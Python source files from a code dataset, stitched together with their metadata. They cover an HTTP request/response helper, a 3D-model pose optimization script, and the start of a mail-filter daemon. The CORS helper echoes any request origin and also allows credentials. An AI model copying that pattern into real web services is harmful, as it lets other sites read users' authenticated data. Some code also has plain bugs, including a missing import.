r'255\\.{3}', # broadcast address\n r'2001\\:db8', # documentation/examples\n r'fc00\\:', # private\n r'fe80\\:', # link local unicast\n r'ff00\\:', # multicast\n r'127\\.', # localhost\n r'\\:\\:1' # localhost\n ])))\n\n ips = self.ips\n for ip in ips:\n if not format_regex.search(ip) and not ip_regex.match(ip):\n r = ip\n break\n\n return r\n\n @_property\n def host(self):\n \"\"\"return the request host\"\"\"\n return self.get_header(\"host\")\n\n @_property\n def scheme(self):\n \"\"\"return the request scheme (eg, http, https)\"\"\"\n scheme = self.environ.get('wsgi.url_scheme', \"http\")\n return scheme\n\n @_property\n def port(self):\n \"\"\"return the server port\"\"\"\n return int(self.environ.get('SERVER_PORT', 0))\n\n @property\n def host_url(self):\n \"\"\"return the request host as a Url instance\"\"\"\n return self.url.host_url()\n\n @property\n def url(self):\n \"\"\"return the full request url as an Url() instance\"\"\"\n scheme = self.scheme\n host = self.host\n path = self.path\n query = self.query\n port = self.port\n\n # normalize the port\n host_domain, host_port = Url.split_hostname_from_port(host)\n if host_port:\n port = host_port\n\n controller_path = \"\"\n if self.controller_info:\n controller_path = self.controller_info.get(\"path\", \"\")\n\n u = Url(\n scheme=scheme,\n hostname=host,\n path=path,\n query=query,\n port=port,\n controller_path=controller_path,\n )\n return u\n\n @_property\n def path(self):\n \"\"\"path part of a url (eg, http://host.com/path?query=string)\"\"\"\n self._path = ''\n path_args = self.path_args\n path = \"/{}\".format(\"/\".join(path_args))\n return path\n\n @_property\n def path_args(self):\n \"\"\"the path converted to list (eg /foo/bar becomes [foo, bar])\"\"\"\n self._path_args = []\n path = self.path\n path_args = filter(None, path.split('/'))\n return path_args\n\n @_property\n def query(self):\n \"\"\"query_string part of a url (eg, http://host.com/path?query=string)\"\"\"\n self._query = query = \"\"\n\n query_kwargs = self.query_kwargs\n if query_kwargs: query = urllib.urlencode(query_kwargs, doseq=True)\n return query\n\n @_property\n def query_kwargs(self):\n \"\"\"{foo: bar, baz: che}\"\"\"\n self._query_kwargs = query_kwargs = {}\n query = self.query\n if query: query_kwargs = self._parse_query_str(query)\n return query_kwargs\n\n @_property\n def body(self):\n \"\"\"return the raw version of the body\"\"\"\n body = None\n if self.body_input:\n body = self.body_input.read(self.get_header('content-length', -1))\n\n return body\n\n @body.setter\n def body(self, body):\n if hasattr(self, \"_body_kwargs\"):\n del(self._body_kwargs)\n\n self.body_input = None\n self._body = body\n\n @_property\n def body_kwargs(self):\n \"\"\"\n the request body, if this is a POST request\n\n this tries to do the right thing with the body, so if you have set the body and\n the content type is json, then it will return the body json decoded, if you need\n the original string body, use body\n\n example --\n\n self.body = '{\"foo\":{\"name\":\"bar\"}}'\n b = self.body_kwargs # dict with: {\"foo\": { \"name\": \"bar\"}}\n print self.body # string with: '{\"foo\":{\"name\":\"bar\"}}'\n \"\"\"\n body_kwargs = {}\n ct = self.get_header(\"content-type\")\n if ct:\n ct = ct.lower()\n if ct.rfind(\"json\") >= 0:\n body = self.body\n if body:\n body_kwargs = json.loads(body)\n\n else:\n if self.body_input:\n body = RequestBody(\n fp=self.body_input,\n headers=self.headers,\n environ=self.environ\n #environ=self.raw_request\n )\n\n body_kwargs = dict(body)\n\n else:\n body = self.body\n if body:\n body_kwargs = self._parse_query_str(body)\n\n return body_kwargs\n\n @body_kwargs.setter\n def body_kwargs(self, body_kwargs):\n self.body_input = None\n self._body_kwargs = body_kwargs\n self._body = self._build_body_str(body_kwargs)\n\n @property\n def kwargs(self):\n \"\"\"combine GET and POST params to be passed to the controller\"\"\"\n kwargs = dict(self.query_kwargs)\n kwargs.update(self.body_kwargs)\n\n return kwargs\n\n def __init__(self):\n self.environ = Headers()\n super(Request, self).__init__()\n\n def version(self, content_type=\"*/*\"):\n \"\"\"\n versioning is based off of this post \n http://urthen.github.io/2013/05/09/ways-to-version-your-api/\n \"\"\"\n v = \"\"\n accept_header = self.get_header('accept', \"\")\n if accept_header:\n a = AcceptHeader(accept_header)\n for mt in a.filter(content_type):\n v = mt[2].get(\"version\", \"\")\n if v: break\n\n return v\n\n def is_method(self, method):\n \"\"\"return True if the request method matches the passed in method\"\"\"\n return self.method.upper() == method.upper()\n\n def has_body(self):\n #return self.method.upper() in set(['POST', 'PUT'])\n return True if self.body_kwargs else False\n #return self.method.upper() not in set(['GET'])\n\n def get_auth_bearer(self):\n \"\"\"return the bearer token in the authorization header if it exists\"\"\"\n access_token = ''\n auth_header = self.get_header('authorization')\n if auth_header:\n m = re.search(r\"^Bearer\\s+(\\S+)$\", auth_header, re.I)\n if m: access_token = m.group(1)\n\n return access_token\n\n def get_auth_basic(self):\n \"\"\"return the username and password of a basic auth header if it exists\"\"\"\n username = ''\n password = ''\n auth_header = self.get_header('authorization')\n if auth_header:\n m = re.search(r\"^Basic\\s+(\\S+)$\", auth_header, re.I)\n if m:\n auth_str = base64.b64decode(m.group(1))\n username, password = auth_str.split(':', 1)\n\n return username, password\n\n\nclass Response(Http):\n \"\"\"The Response object, every request instance that comes in will get a\n corresponding Response instance that answers the Request.\n\n an instance of this class is used to create the text response that will be sent \n back to the client\n\n Request has a ._body and .body, the ._body property is the raw value that is\n returned from the Controller method that handled the request, the .body property\n is a string that is ready to be sent back to the client, so it is _body converted\n to a string. The reason _body isn't name body_kwargs is because _body can be\n almost anything (not just a dict)\n \"\"\"\n\n encoding = \"\"\n\n @property\n def code(self):\n \"\"\"the http status code to return to the client, by default, 200 if a body is present otherwise 204\"\"\"\n code = getattr(self, '_code', None)\n if not code:\n if self.has_body():\n code = 200\n else:\n code = 204\n\n return code\n\n @code.setter\n def code(self, v):\n self._code = v\n\n @property\n def status(self):\n if not getattr(self, '_status', None):\n c = self.code\n status_tuple = BaseHTTPRequestHandler.responses.get(self.code)\n msg = \"UNKNOWN\"\n if status_tuple: msg = status_tuple[0]\n self._status = msg\n\n return self._status\n\n @status.setter\n def status(self, v):\n self._status = v\n\n @property\n def body(self):\n \"\"\"return the body, formatted to the appropriate content type\"\"\"\n b = getattr(self, \"_body\", None)\n# b = None\n# if hasattr(self, '_body'):\n# b = self._body\n return self.normalize_body(b)\n\n @body.setter\n def body(self, v):\n self._body = v\n if self.has_streaming_body():\n filepath = getattr(v, \"name\", \"\")\n if filepath:\n mt = MimeType.find_type(filepath)\n filesize = os.path.getsize(filepath)\n self.set_header(\"Content-Type\", mt)\n self.set_header(\"Content-Length\", filesize)\n logger.debug(\n \"Response body set to file: \\\"{}\\\" with mimetype: \\\"{}\\\" and size: {}\".format(\n filepath,\n mt,\n filesize\n )\n )\n\n else:\n logger.warn(\"Response body is a filestream that has no .filepath property\")\n\n def has_body(self):\n return getattr(self, \"_body\", None) is not None\n# ret = False\n# if hasattr(self, '_body'):\n# r = getattr(self, '_body', None)\n# if r is not None: ret = True\n# \n# return ret\n\n def has_streaming_body(self):\n \"\"\"return True if the response body is a file pointer\"\"\"\n # http://stackoverflow.com/questions/1661262/check-if-object-is-file-like-in-python\n return hasattr(self._body, \"read\") if self.has_body() else False\n\n def normalize_body(self, b):\n \"\"\"return the body as a string, formatted to the appropriate content type\"\"\"\n if b is None: return ByteString(b'', self.encoding)\n\n if self.is_json():\n # I don't like this, if we have a content type but it isn't one\n # of the supported ones we were returning the exception, which threw\n # Jarid off, but now it just returns a string, which is not best either\n # my thought is we could have a body_type_subtype method that would \n # make it possible to easily handle custom types\n # eg, \"application/json\" would become: self.body_application_json(b, is_error)\n b = json.dumps(b, cls=ResponseBody)\n\n else:\n # just return a string representation of body if no content type\n b = ByteString(b, self.encoding)\n\n return b\n\n def is_json(self):\n ct = self.get_header('Content-Type')\n return ct.lower().rfind(\"json\") >= 0 if ct else False\n\n def __iter__(self):\n if self.has_streaming_body():\n fp = self._body\n if fp.closed:\n raise IOError(\"cannot read streaming body because pointer is closed\")\n\n # http://stackoverflow.com/questions/15599639/whats-perfect-counterpart-in-python-for-while-not-eof\n for chunk in iter(partial(fp.read, 8192), ''):\n yield ByteString(chunk)\n\n # close the pointer since we've consumed it\n fp.close()\n\n else:\n yield self.body\n\n def set_cors_headers(self, request_headers, custom_response_headers=None):\n\n allow_headers = request_headers['Access-Control-Request-Headers']\n allow_method = request_headers['Access-Control-Request-Method']\n origin = request_headers['origin']\n\n cors_headers = {\n 'Access-Control-Allow-Origin': origin,\n 'Access-Control-Allow-Credentials': 'true',\n 'Access-Control-Allow-Methods': allow_method,\n 'Access-Control-Allow-Headers': allow_headers,\n 'Access-Control-Max-Age': 3600\n }\n\n if custom_response_headers:\n cors_headers.update(custom_response_headers)\n\n self.add_headers(cors_headers)\n\n def is_success(self):\n \"\"\"return True if this response is considered a \"successful\" response\"\"\"\n code = self.code\n return code < 400\n\n\n","sub_path":"endpoints/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":40337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"74330125","text":"from pytless import inout, renderer, misc\nimport os\nimport numpy as np\nimport scipy.misc\nimport cv2\nimport sys\nimport math\nimport json\nimport PyKDL\nimport numpy\nimport glob\nfrom scipy.optimize import minimize, differential_evolution\nfrom ariadne import Ariadne, ImageSegmentator\n\n\nclass SuperpixelOptimizer(object):\n DEFAULT_FORMAT = 'XYZQ'\n\n def __init__(self, image, K, model, instance_frame, ariadne, debug=False):\n self.image = image\n self.K = K\n self.im_size = (640, 480)\n self.debug = debug\n self.output_image = ariadne.graph.generateBoundaryImage(image)\n self.ariadne = ariadne\n self.model = model\n self.instance_frame = instance_frame\n self.lsd = cv2.createLineSegmentDetector(0)\n self.gains = np.array([1.0, 1, 1, 5, 5, 5, 5])*0.1\n\n def optimizeSuperpixels(self, x):\n\n x = x.reshape(6,).copy()\n base_frame = self.instance_frame\n # x = np.multiply(x, self.gains)\n\n frame = KDLFromArray(x, fmt=LineOptimizer.DEFAULT_FORMAT)\n frame = base_frame*frame\n\n matrix = KLDtoNumpyMatrix(frame)\n R = matrix[:3, :3]\n t = matrix[:3, 3]*1000.0\n\n ren_rgb = renderer.render(self.model, self.im_size, self.K, R, t,\n mode='rgb', surf_color=[0, 1.0, 0])\n\n nonzeroindices = np.argwhere(ren_rgb > 0)\n labels = set(\n ariadne.graph.labels[nonzeroindices[:, 0], nonzeroindices[:, 1]])\n # print(\"LABELS\", )\n # for index in nonzeroindices:\n # label = ariadne.graph.labels[index[0], index[1]]\n # labels[label] = True\n\n zero = np.zeros(self.image.shape[:2])\n output_image = self.output_image.copy()\n for l in labels:\n label_indices = np.argwhere(ariadne.graph.labels == l)\n\n output_image[label_indices[:, 0], label_indices[:, 1]] = np.array(\n [255, 255, 255]).astype(np.uint8)\n\n zero[label_indices[:, 0], label_indices[:, 1]] = np.array(\n [255]).astype(np.uint8)\n\n output_image[nonzeroindices[:, 0], nonzeroindices[:, 1]] = np.array(\n [255, 0, 255]).astype(np.uint8)\n zero[nonzeroindices[:, 0], nonzeroindices[:, 1]] = 0\n\n # cv2.imshow(\"model\", ren_rgb)\n # cv2.imshow(\"image\", output_image)\n # cv2.imshow(\"zero\", zero)\n # c = cv2.waitKey(1)\n\n count = np.count_nonzero(zero.ravel())\n\n if count == 0:\n count = np.inf\n\n # print(\"CURENT X\", x, count)\n return count\n\n def getGradientOrientation(self, image):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=1)\n gy = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=1)\n blurredgx = cv2.GaussianBlur(gx, (11, 3), 1)\n blurredgy = cv2.GaussianBlur(gy, (11, 3), 1)\n magnitude, angle = cv2.cartToPolar(blurredgx, blurredgy)\n return angle\n\n def optimizeGradientOrientation(self, x):\n\n x = x.reshape(7,).copy()\n base_frame = self.instance_frame\n frame = KDLFromArray(x, fmt=LineOptimizer.DEFAULT_FORMAT)\n frame = base_frame*frame\n matrix = KLDtoNumpyMatrix(frame)\n R = matrix[:3, :3]\n t = matrix[:3, 3]*1000.0\n ren_rgb = renderer.render(self.model, self.im_size, self.K, R, t,\n mode='rgb', surf_color=[100, 100, 100])\n\n image_angle = self.getGradientOrientation(self.image)\n model_angle = self.getGradientOrientation(ren_rgb)\n\n mask = np.zeros(image_angle.shape)\n mask[model_angle > 0] = image_angle[model_angle > 0]\n\n diff = np.abs(mask-model_angle)\n\n e = np.sum(diff.ravel())\n output = image.copy()\n output[ren_rgb > 0] = ren_rgb[ren_rgb > 0]\n\n cv2.imshow(\"image\", image_angle)\n cv2.imshow(\"model\", model_angle)\n cv2.imshow(\"mask\", diff)\n cv2.imshow(\"output\", output)\n\n cv2.waitKey(1)\n print(\"Error\", e)\n return e\n\n def optimizeSuperpixelsReduced(self, x):\n\n x = x.reshape(7,).copy()\n\n base_frame = self.instance_frame\n #x = np.multiply(x, self.gains)\n\n frame = KDLFromArray(x, fmt=LineOptimizer.DEFAULT_FORMAT)\n frame = base_frame*frame\n\n matrix = KLDtoNumpyMatrix(frame)\n R = matrix[:3, :3]\n t = matrix[:3, 3]*1000.0\n\n ren_rgb = renderer.render(self.model, self.im_size, self.K, R, t,\n mode='rgb', surf_color=[0, 1.0, 0])\n\n nonzeroindices = np.argwhere(ren_rgb > 0)\n labels_raw = ariadne.graph.labels[\n nonzeroindices[:, 0],\n nonzeroindices[:, 1]\n ].ravel()\n labels = np.unique(labels_raw)\n\n y = np.bincount(labels_raw)\n ii = np.nonzero(y)[0]\n labels_count = dict(zip(ii, y[ii]))\n labels_variance = np.var(y[ii])\n #print(\"LABELS_COUNT\", labels_count, dict(labels_count))\n # And then:\n\n # print(\"LABELS\", labels)\n # for index in nonzeroindices:\n # label = ariadne.graph.labels[index[0], index[1]]\n # labels[label] = True\n\n zero = np.zeros(self.image.shape[:2])\n if self.debug:\n output_image = self.output_image.copy()\n counter = 0\n occupied = 0.0\n total = 0.0\n occupied_map = {}\n for l in labels:\n label_indices = np.argwhere(ariadne.graph.labels == l)\n counter += label_indices.shape[0]\n occupied_map[l] = float(labels_count[l]) / \\\n float(label_indices.shape[0])\n\n if occupied_map[l] > 0.0001:\n occupied += labels_count[l]\n total += label_indices.shape[0]\n\n if self.debug:\n output_image[label_indices[:, 0], label_indices[:, 1]] = np.array(\n [255, 255, 255]).astype(np.uint8)\n\n zero[label_indices[:, 0], label_indices[:, 1]] = np.array(\n [255]).astype(np.uint8)\n\n if self.debug:\n output_image[nonzeroindices[:, 0], nonzeroindices[:, 1]] = np.array(\n [255, 0, 255]).astype(np.uint8)\n zero[nonzeroindices[:, 0], nonzeroindices[:, 1]] = 0\n counter -= nonzeroindices.shape[0]\n\n void_space_single = 0.0\n for k, v in occupied_map.items():\n void_space_single += v\n void_space_single /= float(labels.shape[0])\n\n void_space = (float(total)-float(occupied))/float(total)\n #print(\"VOID_SPACE\", void_space, void_space_single)\n\n if self.debug:\n cv2.imshow(\"model\", ren_rgb)\n cv2.imshow(\"image\", output_image)\n cv2.imshow(\"zero\", zero)\n c = cv2.waitKey(1)\n\n #count = counter - labels_variance*0.01\n e = void_space\n print(\"COUNTER DIFFERENCE\", void_space,\n void_space*labels.shape[0], void_space_single)\n # if count == 0:\n # count = np.inf\n\n # print(\"CURENT X\", x, count)\n return e\n # return np.linalg.norm(x - np.array([0.05, 0.04, 0.03, 0.01, 0.01, 0.01, 5.0]))\n\n def runOptimization(self, opt_type=\"ga\"):\n if opt_type == 'ga':\n x0 = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0])\n max_disp = 0.01\n max_angle = (15*math.pi/180.0)\n bounds = [\n (-max_disp, max_disp),\n (-max_disp, max_disp),\n (-max_disp, max_disp),\n (-max_angle, max_angle),\n (-max_angle, max_angle),\n (-max_angle, max_angle),\n (-max_angle, max_angle)\n ]\n\n res = differential_evolution(\n # self.optimizeSuperpixelsReduced,\n self.optimizeGradientOrientation,\n bounds=bounds, disp=True,\n strategy='best2bin',\n popsize=20, maxiter=5,\n polish=True, mutation=(0.5, 1)\n )\n\n else:\n # map(float, np.array(args['initial_guess']))\n x0 = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0])\n max_disp = 0.01\n max_angle = (10*math.pi/180.0)\n bounds = [\n (-max_disp, max_disp),\n (-max_disp, max_disp),\n (-max_disp, max_disp),\n (-max_angle, max_angle),\n (-max_angle, max_angle),\n (-max_angle, max_angle),\n (-max_angle, max_angle)\n ]\n\n res = minimize(\n # self.optimizeSuperpixelsReduced,\n self.optimizeGradientOrientation,\n x0,\n method='L-BFGS-B',\n bounds=bounds,\n options={'maxiter': 100000, 'disp': True, 'eps': 0.001})\n print(\"RESULT\", res.x)\n return res.x\n\n\nclass LineOptimizer(object):\n DEFAULT_FORMAT = 'RPY'\n\n def __init__(self, K, image, model, instance_frame):\n self.K = K\n kernel = np.ones((3, 3), np.float32)/9.0\n self.image = cv2.filter2D(image, -1, kernel)\n self.gray = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n\n self.img_size = (640, 480)\n self.model = model\n self.instance_frame = instance_frame\n self.lsd = cv2.createLineSegmentDetector(0)\n self.gains = [1]*6 # [10, 10, 10, 50, 50, 50]\n\n def getEdgesWithThreshold(self, model, th=1.0):\n for edge, faces in self.model['edges_graph'].iteritems():\n if len(faces) >= 2:\n f1 = model['faces'][faces[0]]\n f2 = model['faces'][faces[1]]\n n1 = model['normals'][faces[0]]\n n2 = model['normals'][faces[1]]\n\n angle = math.acos(np.clip(np.dot(n1, n2), -1.0, 1.0))\n if angle > th:\n pass\n\n def drawSegments(self, image, segments, line_width=2, min_length=1):\n\n cop = image.copy()\n if segments is not None:\n for i in range(0, segments.shape[0]):\n line = segments[i, 0, :]\n p1 = line[: 2]\n p2 = line[2: 4]\n dist = np.linalg.norm(p1-p2)\n if dist < min_length:\n continue\n cv2.line(\n cop,\n tuple(line[:2].astype(int)),\n tuple(line[2:4].astype(int)),\n (255, 0, 0), line_width\n )\n return cop\n\n def runOptimization(self, opt_type=\"RGB\"):\n\n # map(float, np.array(args['initial_guess']))\n x0 = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n max_disp = 0.5\n max_angle = 3.0\n bounds = [\n (-max_disp, max_disp),\n (-max_disp, max_disp),\n (-max_disp, max_disp),\n (-max_angle, max_angle),\n (-max_angle, max_angle),\n (-max_angle, max_angle)\n ]\n\n def cb(x):\n print(\"Minimization\", x)\n\n if opt_type == \"LINES\":\n # res = minimize(self.optimize, x0,\n # method='L-BFGS-B',\n # bounds=bounds,\n\n # options={'maxiter': 100000, 'disp': True, 'eps': 0.001})\n\n res = differential_evolution(self.optimize,\n bounds=bounds\n )\n\n # res = minimize(self.optimize, x0,\n # method='Nelder-Mead',\n # bounds=bounds,\n # options={'maxiter': 100000, 'disp': True, 'fatol': 0.1})\n\n if opt_type == \"RGB\":\n res = minimize(self.optimizeRGBDifference, x0,\n method='Nelder-Mead',\n bounds=bounds,\n options={'maxiter': 100000, 'disp': True})\n\n # res = differential_evolution(self.optimizeRGBDifference,\n # bounds,\n # mutation=(0, 0.001)\n # )\n\n print(\"RESULT\", res.x)\n return np.multiply(res.x, self.gains)\n\n def optimize(self, x):\n\n x = x.reshape(6,).copy()\n base_frame = self.instance_frame\n x = np.multiply(x, self.gains)\n\n frame = KDLFromArray(x, fmt=LineOptimizer.DEFAULT_FORMAT)\n frame = base_frame*frame\n\n matrix = KLDtoNumpyMatrix(frame)\n R = matrix[:3, :3]\n t = matrix[:3, 3]*1000.0\n\n ren_rgb = renderer.render(\n self.model,\n self.img_size,\n self.K,\n R, t, mode='rgb', surf_color=(1, 1, 1), ambient_weight=0.0)\n\n rgb_lines = lsd.detect(self.gray)[0]\n model_lines = lsd.detect(cv2.cvtColor(ren_rgb, cv2.COLOR_BGR2GRAY))[0]\n\n zeros = np.zeros(self.gray.shape)\n rgb_lines_img = self.drawSegments(zeros, rgb_lines)\n model_lines_img = self.drawSegments(zeros, model_lines)\n\n rendered_image = cv2.addWeighted(self.image, 1, ren_rgb, 0.85, 0)\n\n # rgb_lines_img = lsd.drawSegments(zeros, rgb_lines)\n # model_lines_img = lsd.drawSegments(zeros, model_lines)\n # diff = rgb_lines_img - model_lines_img\n diff = cv2.bitwise_and(rgb_lines_img, model_lines_img)\n # diff = np.abs(diff.astype(np.uint8))\n\n count = np.count_nonzero(diff.ravel())\n print(\"MAXMIN\", np.min(diff), np.max(diff), count)\n\n cv2.imshow(\"model\", rendered_image)\n cv2.imshow(\"opt_rgb\", rgb_lines_img)\n cv2.imshow(\"opt_model\", model_lines_img)\n cv2.imshow(\"opt_diff\", diff)\n cv2.waitKey(10)\n return -count\n\n def optimizeRGBDifference(self, x):\n\n x = x.reshape(6,).copy()\n base_frame = self.instance_frame\n x = np.multiply(x, self.gains)\n\n if np.linalg.norm(x[:3]) > 0.2:\n return np.inf\n # x[3:] = x[3:]*180/math.pi\n\n frame = KDLFromArray(x, fmt=LineOptimizer.DEFAULT_FORMAT)\n frame = base_frame*frame\n\n matrix = KLDtoNumpyMatrix(frame)\n R = matrix[:3, :3]\n t = matrix[:3, 3]*1000.0\n\n ren_rgb = renderer.render(\n self.model,\n self.img_size,\n self.K,\n R, t, mode='rgb') # , surf_color=(76.0/255.0, 72.0/255.0, 82.0/255.0))\n\n gray = self.gray\n rgb_lines = lsd.detect(gray)[0]\n model_lines = lsd.detect(cv2.cvtColor(ren_rgb, cv2.COLOR_BGR2GRAY))[0]\n\n zeros = np.zeros(self.gray.shape)\n rgb_lines_img = self.drawSegments(zeros, rgb_lines)\n model_lines_img = self.drawSegments(zeros, model_lines)\n\n ren_rgb = cv2.cvtColor(ren_rgb, cv2.COLOR_BGR2GRAY)\n\n rendered_image = gray.copy()\n rendered_image[ren_rgb != 0] = ren_rgb[ren_rgb != 0]\n\n grayf = gray.astype(float)\n rendered_imagef = rendered_image.astype(float)\n\n diff = np.abs(grayf - rendered_imagef)/255.0\n\n # rgb_lines_img = lsd.drawSegments(zeros, rgb_lines)\n # model_lines_img = lsd.drawSegments(zeros, model_lines)\n\n count = np.sum(diff)\n print(\"MAXMIN\", np.min(diff), np.max(diff))\n\n cv2.imshow(\"model\", rendered_image)\n cv2.imshow(\"diff\", diff)\n cv2.waitKey(10)\n return count\n\n\ndef KDLtoArray(frame, fmt='RPY'):\n if fmt == 'XYZQ':\n p = frame.p\n q = frame.M.GetQuaternion()\n return numpy.array([\n p.x(), p.y(), p.z(), q[0], q[1], q[2], q[3]\n ]).reshape(1, 7)\n elif fmt == 'RPY':\n p = frame.p\n roll, pitch, yaw = frame.M.GetRPY()\n return numpy.array([\n p.x(), p.y(), p.z(), roll, pitch, yaw\n ]).reshape(1, 6)\n\n\ndef KDLFromArray(chunks, fmt='XYZQ'):\n if fmt == 'RPY':\n frame = PyKDL.Frame()\n frame.p = PyKDL.Vector(\n chunks[0], chunks[1], chunks[2]\n )\n frame.M = PyKDL.Rotation.RPY(\n chunks[3],\n chunks[4],\n chunks[5]\n )\n return frame\n if fmt == 'XYZQ':\n frame = PyKDL.Frame()\n frame.p = PyKDL.Vector(\n chunks[0], chunks[1], chunks[2]\n )\n q = np.array([chunks[3],\n chunks[4],\n chunks[5],\n chunks[6]])\n q = q / np.linalg.norm(q)\n frame.M = PyKDL.Rotation.Quaternion(q[0], q[1], q[2], q[3])\n return frame\n\n\ndef KLDtoNumpyMatrix(frame):\n M = frame.M\n R = numpy.array([\n [M[0, 0], M[0, 1], M[0, 2]],\n [M[1, 0], M[1, 1], M[1, 2]],\n [M[2, 0], M[2, 1], M[2, 2]],\n ])\n P = numpy.transpose(\n numpy.array([\n frame.p.x(),\n frame.p.y(),\n frame.p.z()\n ])\n )\n P = P.reshape(3, 1)\n T = numpy.concatenate([R, P], 1)\n T = numpy.concatenate([T, numpy.array([0, 0, 0, 1]).reshape(1, 4)], 0)\n return T\n\n\nimages_path = '/Users/daniele/Desktop/to_delete/roars_dataset/indust_scene_1_dome/camera_rgb_image_raw_compressed'\ndataset_path = '/Users/daniele/Desktop/to_delete/roars_dataset/indust_scene_1_dome.roars'\ncamera_extrinsics_path = '/Users/daniele/Desktop/to_delete/roars_dataset/indust_scene_1_dome/camera_extrinsics.txt'\ncamera_intrinsics_path = '/Users/daniele/Desktop/to_delete/roars_dataset/indust_scene_1_dome/camera_intrisics.txt'\nposes_path = '/Users/daniele/Desktop/to_delete/roars_dataset/indust_scene_1_dome/robot_poses.txt'\n#model_path = '/Users/daniele/Downloads/industrial_part2.ply'\nmodel_path = '/Users/daniele/Desktop/test.ply'\n\n#######################################\n# Model\n#######################################\nmodel = inout.load_ply(model_path)\n\n\n#######################################\n# Dataset data\n#######################################\njson_data = json.load(open(dataset_path))\n\n\n#######################################\n# Intrinsics\n#######################################\nK_raw = np.loadtxt(camera_intrinsics_path)\nK = np.array([\n [K_raw[2], 0, K_raw[4]],\n [0, K_raw[3], K_raw[5]],\n [0, 0, 1.0]\n])\n\n#######################################\n# Extrinsics\n#######################################\ncamera_extrinsics = KDLFromArray(np.loadtxt(camera_extrinsics_path))\nprint(\"CAMERA EXTRINSICS\", camera_extrinsics)\n\n#######################################\n# Poses\n#######################################\nposes = []\nraw_poses = np.loadtxt(poses_path)\nfor p in raw_poses:\n frame = KDLFromArray(p)*camera_extrinsics\n poses.append(frame)\n\n#######################################\n# Images\n#######################################\nimages = sorted(glob.glob(os.path.join(images_path, \"*.jpg\")))\nprint(len(poses), len(images))\n\ninstances_poses = []\nfor instance in json_data['classes']['5']['instances']:\n frame = KDLFromArray(instance['frame'])\n instances_poses.append(frame)\n print(frame)\n\n\nimage_path = sys.argv[1]\ninitial_guess = sys.argv[2]\nchunks = map(float, initial_guess.split(\";\"))\nprint(\"CH(NKS\", chunks)\ninitial_guess = KDLFromArray(chunks, fmt=\"RPY\")\n\ndindex = 20\n\nroll = -83\npitch = 70\nlsd = cv2.createLineSegmentDetector(0)\noptimized_correction = None # PyKDL.Frame()\nwhile True:\n image = cv2.imread(image_path)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n instance_frame = initial_guess\n\n instance_frame_matrix = KLDtoNumpyMatrix(instance_frame)\n R = instance_frame_matrix[:3, :3]\n t = instance_frame_matrix[:3, 3]*1000.0\n im_size = (640, 480)\n\n print(\"OBJECT POSE\", instance_frame.M.GetQuaternion(), t)\n ren_rgb = renderer.render(model, im_size, K, R, t,\n mode='rgb', surf_color=[0, 1.0, 0])\n\n if optimized_correction is not None:\n print(\"CORRECTING WIGH\", optimized_correction)\n instance_frame = instance_frame*optimized_correction\n else:\n image_copy = cv2.addWeighted(image, 1, ren_rgb, 0.85, 0)\n cv2.imshow(\"image\", image_copy)\n c = cv2.waitKey(0)\n\n # opt.optimizeSuperpixels(np.array([0.0, 0, 0, 0, 0, 0]))\n\n # if optimized_correction is not None:\n # print(\"CORRECTING WIGH\", optimized_correction)\n # instance_frame = instance_frame*optimized_correction\n\n # instance_frame_matrix = KLDtoNumpyMatrix(instance_frame)\n\n instance_frame_matrix = KLDtoNumpyMatrix(instance_frame)\n R = instance_frame_matrix[:3, :3]\n t = instance_frame_matrix[:3, 3]*1000.0\n im_size = (640, 480)\n ren_rgb = renderer.render(model, im_size, K, R, t,\n mode='rgb', surf_color=[0, 1.0, 0])\n\n image_copy = cv2.addWeighted(image, 1, ren_rgb, 0.85, 0)\n cv2.imshow(\"model\", ren_rgb)\n cv2.imshow(\"image\", image_copy)\n c = cv2.waitKey(0)\n\n if c == 111:\n if optimized_correction is None:\n segmentator = ImageSegmentator(segmentator_type='SLIC')\n segmentator.options_map['n_segments'] = 1500 # 2500\n segmentator.options_map['compactness'] = 10\n segmentator.options_map['sigma'] = 1\n #######################################\n # Ariadne\n #######################################\n ariadne = Ariadne(\n image_file=image_path, segmentator=segmentator)\n opt = SuperpixelOptimizer(\n image, K, model, instance_frame, ariadne, debug=True)\n optimized_correction = KDLFromArray(\n opt.runOptimization(), fmt=\"RPY\")\n\n #######################################\n # Roll\n #######################################\n if c == 114:\n roll += 1.0\n if c == 102:\n roll -= 1.0\n\n #######################################\n # Pitch\n #######################################\n if c == 116:\n pitch += 1.0\n if c == 103:\n pitch -= 1.0\n\n print(c, \"Pitch\", pitch, \"Roll\", roll)\n if c == 113:\n break\n","sub_path":"test_single_image.py","file_name":"test_single_image.py","file_ext":"py","file_size_in_byte":21780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"177496708","text":"import argparse\nimport os\nimport sys\nimport ConfigParser\nimport asyncore\nimport re\nfrom daemonize import Daemonize\n\nfrom __init__ import __version__\nfrom logs import get_surgat_logger\nfrom replay import ReplayMessage\nfrom surgat import SurgatMailServer\n\n\nstartup_options = []\n\n\ndef filesize(sz):\n if sz is int:\n return sz\n sz = sz.replace(',', '')\n ck = re.search(\"([0-9]+)([kKmM]?)\", sz)\n if ck is not None:\n sz = int(ck.group(1))\n if ck.group(2).lower() == 'k':\n sz *= 1024\n elif ck.group(2).lower() == 'm':\n sz *= 1024 * 1024\n return sz\n return sz\n\n\ndef interval(i):\n \"\"\" Return a (possible) string value as minutes... \"\"\"\n i = i.strip().replace(' ', '')\n if i is int:\n return i\n ck = re.search(\"([0-9]+)([a-zA-Z]+)\", i)\n if ck is None:\n return int(i)\n n = int(ck.group(1))\n if ck.group(2).lower() in ['s', 'sec', 'secs']:\n return min(1, math.floor(n * 60))\n if ck.group(2).lower() in ['h', 'hr', 'hrs', 'hour', 'hours']:\n return n * 60\n if ck.group(2).lower() in ['d', 'day', 'days']:\n return n * 24 * 60\n return i\n\n\ndef check_directory(cfg_fn, directory_path):\n if not os.path.isabs(directory_path):\n return os.path.join(os.path.abspath(os.path.dirname(cfg_fn)), directory_path)\n return 